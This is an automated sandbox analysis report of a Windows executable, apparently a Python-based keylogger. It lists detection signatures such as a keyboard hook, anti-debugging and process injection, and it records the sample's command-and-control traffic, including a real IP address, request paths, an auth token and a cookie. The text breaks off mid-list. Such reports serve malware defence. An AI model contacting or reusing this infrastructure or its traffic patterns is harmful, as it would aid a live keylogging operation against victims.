Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
app.exe

Overview

General Information

Sample name:app.exe
Analysis ID:1554551
MD5:ee3f845b0064d326c91bc200fe87fa2e
SHA1:e9d99e982eef27dea832f38a3ba8e0b25ff3fc8e
SHA256:134ef7be21da1bf756cc595ddd67b1caedda2ab4bb200ef9bbec5173aff7ffb1
Tags:exewindowsuser-TheRavenFile
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Python Keylogger
Installs a global keyboard hook
Uses known network protocols on non-standard ports
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • app.exe (PID: 2228 cmdline: "C:\Users\user\Desktop\app.exe" MD5: EE3F845B0064D326C91BC200FE87FA2E)
    • app.exe (PID: 4308 cmdline: "C:\Users\user\Desktop\app.exe" MD5: EE3F845B0064D326C91BC200FE87FA2E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: app.exe PID: 4308JoeSecurity_PythonKeyloggerYara detected Python KeyloggerJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-12T16:50:19.161491+010020229301A Network Trojan was detected172.202.163.200443192.168.2.549708TCP
    2024-11-12T16:51:00.524914+010020229301A Network Trojan was detected172.202.163.200443192.168.2.564106TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results
    Source: app.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: app.exe, 00000000.00000003.2044009957.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: app.exe, 00000000.00000003.2044240662.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291253287.00007FF8B8B24000.00000002.00000001.01000000.0000000C.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_asyncio.pdb source: app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_multiprocessing.pdb source: app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_ssl.pdb source: app.exe, 00000002.00000002.3290821663.00007FF8B7E1D000.00000002.00000001.01000000.00000011.sdmp
    Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: app.exe, 00000000.00000003.2041668057.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
    Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: app.exe, 00000000.00000003.2040994788.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291768707.00007FF8B8F89000.00000002.00000001.01000000.00000009.sdmp
    Source: Binary string: ucrtbase.pdb source: app.exe, 00000002.00000002.3288925159.00007FF8A9351000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: app.exe, 00000000.00000003.2042220965.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: app.exe, 00000000.00000003.2041445729.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291669459.00007FF8B8F75000.00000002.00000001.01000000.0000000F.sdmp
    Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.8\Release\pywintypes.pdb source: app.exe, 00000002.00000002.3290723067.00007FF8B7DF1000.00000002.00000001.01000000.00000013.sdmp
    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: app.exe, 00000000.00000003.2043073708.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: app.exe, 00000000.00000003.2043836755.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
    Source: Binary string: C:\A\21\b\bin\amd64\_overlapped.pdb source: app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: app.exe, 00000000.00000003.2044345299.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: app.exe, 00000002.00000002.3291871307.00007FF8B93D1000.00000002.00000001.01000000.00000007.sdmp
    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: app.exe, 00000000.00000003.2041888729.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
    Source: Binary string: p.win-amd64-3.8\Release\_win32sysloader.pdb source: app.exe, 00000000.00000003.2041226515.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: app.exe, 00000000.00000003.2043495149.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: app.exe, 00000000.00000003.2039012355.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291470377.00007FF8B8C15000.00000002.00000001.01000000.00000024.sdmp
    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: app.exe, 00000000.00000003.2042910662.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291372022.00007FF8B8B3E000.00000002.00000001.01000000.0000000B.sdmp
    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: app.exe, 00000000.00000003.2043753016.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_queue.pdb source: app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291968105.00007FF8B9843000.00000002.00000001.01000000.0000000E.sdmp
    Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: app.exe, 00000000.00000003.2041521665.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: vcruntime140.amd64.pdbGCTL source: app.exe, 00000000.00000003.2038853805.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3292106073.00007FF8BA24E000.00000002.00000001.01000000.00000006.sdmp
    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: app.exe, 00000000.00000003.2042499534.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.8\Release\win32pdh.pdb source: win32pdh.pyd.0.dr
    Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: app.exe, 00000000.00000003.2041296869.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: app.exe, 00000000.00000003.2041595247.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: app.exe, 00000000.00000003.2043659043.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
    Source: Binary string: C:\A\6\b\libssl-1_1.pdb source: app.exe, 00000002.00000002.3288474877.00007FF8A8F03000.00000002.00000001.01000000.00000012.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: app.exe, 00000000.00000003.2070807041.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3292285552.00007FF8BA4F3000.00000002.00000001.01000000.0000000A.sdmp, select.pyd.0.dr
    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: app.exe, 00000000.00000003.2042670052.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
    Source: Binary string: ucrtbase.pdbUGP source: app.exe, 00000002.00000002.3288925159.00007FF8A9351000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: vcruntime140.amd64.pdb source: app.exe, 00000000.00000003.2038853805.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3292106073.00007FF8BA24E000.00000002.00000001.01000000.00000006.sdmp
    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: app.exe, 00000000.00000003.2039012355.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291470377.00007FF8B8C15000.00000002.00000001.01000000.00000024.sdmp
    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: app.exe, 00000000.00000003.2044637351.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\pyexpat.pdb source: app.exe, 00000002.00000002.3290963193.00007FF8B7E52000.00000002.00000001.01000000.0000000D.sdmp
    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: app.exe, 00000002.00000002.3285964356.00007FF8A80F6000.00000002.00000001.01000000.00000023.sdmp, MSVCP140.dll.0.dr
    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: app.exe, 00000000.00000003.2041817197.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.8\Release\pywintypes.pdb** source: app.exe, 00000002.00000002.3290723067.00007FF8B7DF1000.00000002.00000001.01000000.00000013.sdmp
    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdbGCTL source: app.exe, 00000002.00000002.3285964356.00007FF8A80F6000.00000002.00000001.01000000.00000023.sdmp, MSVCP140.dll.0.dr
    Source: Binary string: C:\A\21\b\bin\amd64\python3.pdb source: app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: app.exe, 00000000.00000003.2042990999.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\6\b\libssl-1_1.pdb?? source: app.exe, 00000002.00000002.3288474877.00007FF8A8F03000.00000002.00000001.01000000.00000012.sdmp
    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: app.exe, 00000000.00000003.2042415024.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: app.exe, 00000000.00000003.2041370917.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1d 10 Sep 2019built on: Mon Sep 16 11:00:37 2019 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: app.exe, 00000002.00000002.3287213051.00007FF8A8713000.00000002.00000001.01000000.00000010.sdmp
    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: app.exe, 00000000.00000003.2043573928.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
    Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: app.exe, 00000002.00000002.3287588669.00007FF8A8B0D000.00000002.00000001.01000000.00000005.sdmp, python38.dll.0.dr
    Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291253287.00007FF8B8B24000.00000002.00000001.01000000.0000000C.sdmp
    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: app.exe, 00000000.00000003.2044094725.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: app.exe, 00000000.00000003.2042128630.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.0.dr
    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: app.exe, 00000000.00000003.2042580638.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: app.exe, 00000000.00000003.2042333645.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: app.exe, 00000000.00000003.2044856644.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_decimal.pdb source: app.exe, 00000002.00000002.3289036482.00007FF8B054D000.00000002.00000001.01000000.00000026.sdmp
    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: app.exe, 00000000.00000003.2042754649.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: app.exe, 00000000.00000003.2043165569.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: app.exe, 00000000.00000003.2042831387.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: app.exe, 00000000.00000003.2041742051.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_elementtree.pdb source: app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: app.exe, 00000000.00000003.2044162437.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: app.exe, 00000000.00000003.2042037638.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_decimal.pdb## source: app.exe, 00000002.00000002.3289036482.00007FF8B054D000.00000002.00000001.01000000.00000026.sdmp
    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: app.exe, 00000000.00000003.2041962953.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: app.exe, 00000002.00000002.3287213051.00007FF8A8713000.00000002.00000001.01000000.00000010.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: app.exe, 00000000.00000003.2071451960.0000022254572000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3285578905.00007FF8A7FE5000.00000002.00000001.01000000.00000028.sdmp
    Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.8\Release\win32api.pdb source: win32api.pyd.0.dr
    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: app.exe, 00000000.00000003.2043932736.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: app.exe, 00000000.00000003.2044508949.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE96644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF7ACE96644
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE96644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF7ACE96644
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE87790 FindFirstFileExW,FindClose,0_2_00007FF7ACE87790
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACEA08E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7ACEA08E4
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE96644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,2_2_00007FF7ACE96644
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE96644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,2_2_00007FF7ACE96644
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE87790 FindFirstFileExW,FindClose,2_2_00007FF7ACE87790
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACEA08E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF7ACEA08E4
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80AA260 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,2_2_00007FF8A80AA260

    Networking

    barindex
    Uses known network protocols on non-standard ports
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 5000
    Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 5000
    Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 5000
    Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49707
    Source: global trafficTCP traffic: 192.168.2.5:49705 -> 116.198.204.121:5000
    Source: global trafficHTTP traffic detected: GET /xiewangzhenyan HTTP/1.1Upgrade: websocketHost: 116.198.204.121:5000Origin: http://116.198.204.121:5000Sec-WebSocket-Key: ScSGY5QfdPym9roNV3Q5ZA==Sec-WebSocket-Version: 13Connection: upgrade
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:49708
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:64106
    Source: global trafficHTTP traffic detected: GET /102019base HTTP/1.1Host: 116.198.204.121:5000User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0Accept-Encoding: gzip, deflate, br, zstdAccept: */*Connection: keep-aliveAuthorization: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJvWjlKaXdSVW1vdl9GTl8wSWVHTlBSWUh4d1ZVIiwiZXhwIjoxNjYyODY2NjM5fQ.3iOvX3R5vcdlxd9IIHnzXiVV7ZY6ipgSuBNt3daR51wContent-Type: application/json;charset=UTF-8Referer: https://www.baidu.com/Cookie: sid=079cbb01-8f44-4dc6-8fd0-3df76e4ee289
    Source: global trafficHTTP traffic detected: GET /102019key HTTP/1.1Host: 116.198.204.121:5000User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0Accept-Encoding: gzip, deflate, br, zstdAccept: */*Connection: keep-aliveAuthorization: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJvWjlKaXdSVW1vdl9GTl8wSWVHTlBSWUh4d1ZVIiwiZXhwIjoxNjYyODY2NjM5fQ.3iOvX3R5vcdlxd9IIHnzXiVV7ZY6ipgSuBNt3daR51wContent-Type: application/json;charset=UTF-8Referer: https://www.baidu.com/Cookie: sid=079cbb01-8f44-4dc6-8fd0-3df76e4ee289
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: unknownTCP traffic detected without corresponding DNS query: 116.198.204.121
    Source: global trafficHTTP traffic detected: GET /102019base HTTP/1.1Host: 116.198.204.121:5000User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0Accept-Encoding: gzip, deflate, br, zstdAccept: */*Connection: keep-aliveAuthorization: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJvWjlKaXdSVW1vdl9GTl8wSWVHTlBSWUh4d1ZVIiwiZXhwIjoxNjYyODY2NjM5fQ.3iOvX3R5vcdlxd9IIHnzXiVV7ZY6ipgSuBNt3daR51wContent-Type: application/json;charset=UTF-8Referer: https://www.baidu.com/Cookie: sid=079cbb01-8f44-4dc6-8fd0-3df76e4ee289
    Source: global trafficHTTP traffic detected: GET /102019key HTTP/1.1Host: 116.198.204.121:5000User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0Accept-Encoding: gzip, deflate, br, zstdAccept: */*Connection: keep-aliveAuthorization: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJvWjlKaXdSVW1vdl9GTl8wSWVHTlBSWUh4d1ZVIiwiZXhwIjoxNjYyODY2NjM5fQ.3iOvX3R5vcdlxd9IIHnzXiVV7ZY6ipgSuBNt3daR51wContent-Type: application/json;charset=UTF-8Referer: https://www.baidu.com/Cookie: sid=079cbb01-8f44-4dc6-8fd0-3df76e4ee289
    Source: global trafficHTTP traffic detected: GET /xiewangzhenyan HTTP/1.1Upgrade: websocketHost: 116.198.204.121:5000Origin: http://116.198.204.121:5000Sec-WebSocket-Key: ScSGY5QfdPym9roNV3Q5ZA==Sec-WebSocket-Version: 13Connection: upgrade
    Source: app.exe, 00000002.00000002.3284288598.000002083A8F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
    Source: app.exe, 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://.css
    Source: app.exe, 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://.jpg
    Source: app.exe, 00000002.00000002.3284661842.000002083AD20000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3278039696.0000020832E80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://116.198.204.121:5000
    Source: app.exe, 00000002.00000002.3284691267.000002083ADD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://116.198.204.121:5000/102019base
    Source: app.exe, 00000002.00000002.3284691267.000002083ADD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://116.198.204.121:5000/102019base0%
    Source: app.exe, 00000002.00000002.3284691267.000002083ADD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://116.198.204.121:5000/102019key
    Source: app.exe, 00000002.00000002.3278071149.0000020833029000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2092269988.0000020833029000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.198.204.121:5000c
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmpString found in binary or memory: http://arxiv.org/abs/1805.10941.
    Source: app.exe, 00000002.00000002.3283351198.000002083A0C2000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833952000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
    Source: app.exe, 00000002.00000002.3284418013.000002083AAD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue23606)
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254572000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 